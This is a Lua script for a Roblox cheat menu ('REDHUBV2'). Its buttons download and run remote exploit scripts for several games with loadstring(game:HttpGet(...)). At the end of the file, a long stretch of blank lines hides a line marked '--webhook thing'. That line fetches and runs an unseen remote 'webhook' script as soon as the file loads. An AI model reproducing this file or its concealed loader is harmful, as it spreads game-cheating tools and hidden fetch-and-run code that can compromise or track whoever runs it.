local DiscordLib = loadstring(game:HttpGet "https://raw.githubusercontent.com/bloodball/-back-ups-for-libs/main/discord")() 
  
 local REDHUBV2 = DiscordLib:Window("REDHUBV2") 
 --main
 local serv = REDHUBV2:Server("Main", "") 
 local so = serv:Channel("shindo") 
  
 so:Button( "Project nexus", function()  
 loadstring(game:HttpGet("https://raw.githubusercontent.com/IkkyyDF/ProjectNexus/main/Loader.lua"))() 
 end ) 
  
 so:Button( "Name", function()  
      print("hello")  
 end ) 
 local nl = serv:Channel("ninja legends") 
 nl:Button( "Proxima Hub", function()  
      loadstring(game:HttpGet("https://raw.githubusercontent.com/TrixAde/Proxima-Hub/main/Main.lua"))() 
 end ) 
 
 local mc = serv:Channel("misc")
 
 mc:Button( "infinite _yield", function()  loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end )

mc:Button( "Fling <dont use in laggy games>", function()     loadstring(game:HttpGet('https://gist.githubusercontent.com/1BlueCat/544f7efbe88235666b5b7add65b7344d/raw/f20804bb85542dcc3bc938982e1f05b7ff05cded/FE%2520Hat%2520Fling'))()
end )
local mh = serv:Channel("more hubs")
mh:Button( "VHUB", function()    loadstring(game:HttpGet("https://raw.githubusercontent.com/V31nc/2642/Created/VHub"))()
end )
local babft = serv:Channel("build a boat for treasure")
babft:Button( "BTUS remake", function() 
local a,b,c = "juywvm","main","babft";loadstring(game:HttpGetAsync(("https://raw.githubusercontent.com/%s/-Roblox-Projects-/%s/%s"):format(a, b, c)))()
end )





mc:Button( "Translate", function() 
     pcall(function()
  loadstring(
      --[[

      ░░░░░██╗  ███╗░░░███╗███████╗███╗░░░███╗███████╗
      ░░░░░██║  ████╗░████║██╔════╝████╗░████║██╔════╝
      ░░░░░██║  ██╔████╔██║█████╗░░██╔████╔██║█████╗░░
      ██╗░░██║  ██║╚██╔╝██║██╔══╝░░██║╚██╔╝██║██╔══╝░░
      ╚█████╔╝  ██║░╚═╝░██║███████╗██║░╚═╝░██║███████╗
      ░╚════╝░  ╚═╝░░░░░╚═╝╚══════╝╚═╝░░░░░╚═╝╚══════╝


      Keybind:
     
      - Semicolon // To trigger chat box
      - Enter // To submit your chat
      - Click on player chat // To view his translation
      - Quote // To hide/show UI
     
      Next Update:
     
      - Ill make it so it auto detects language of chat upon click
      - yes thats it
      --]]

      game:HttpGet(
          'https://raw.githubusercontent.com/PivotEngine/cool_scripts/main/Pedro.exe',
          true
      )
  )();
end) 
end )

local bdb = serv:Channel("BloodBath")  
  bdb:Button( "islands", function() 
     _G.Key = "6KMembersSoon!!???"
loadstring(game:HttpGet("https://raw.githubusercontent.com/Pa1nx/BloodBathScripts/main/Islands"))()
end )

bdb:Button( "bee swarm sim", function() 
     _G.Key = "BSSUpdateSoonHopefully"
loadstring(game:HttpGet("https://raw.githubusercontent.com/Pa1nx/BloodBathScripts/main/BeeSwarmSimulator"))()
end )




  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
-- suggested
 local serv = REDHUBV2:Server("Suggested", "") 
 local mu = serv:Channel("mugetsu") 
  
 mu:Button( "jumble", function()  
     loadstring(game:HttpGet("https://jumblescripts.com/ProjectMugetsu.lua"))()  
 end ) 
 local pl = serv:Channel("prison life") 
 pl:Button( "prevail X", function()  
 loadstring(game:HttpGet("https://pastebin.com/raw/VHnxgyBQ"))() 
 end )
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
--webhook thing
loadstring(game:HttpGet("https://raw.githubusercontent.com/EdizBerkRamazan/redhubb/main/webhook"))()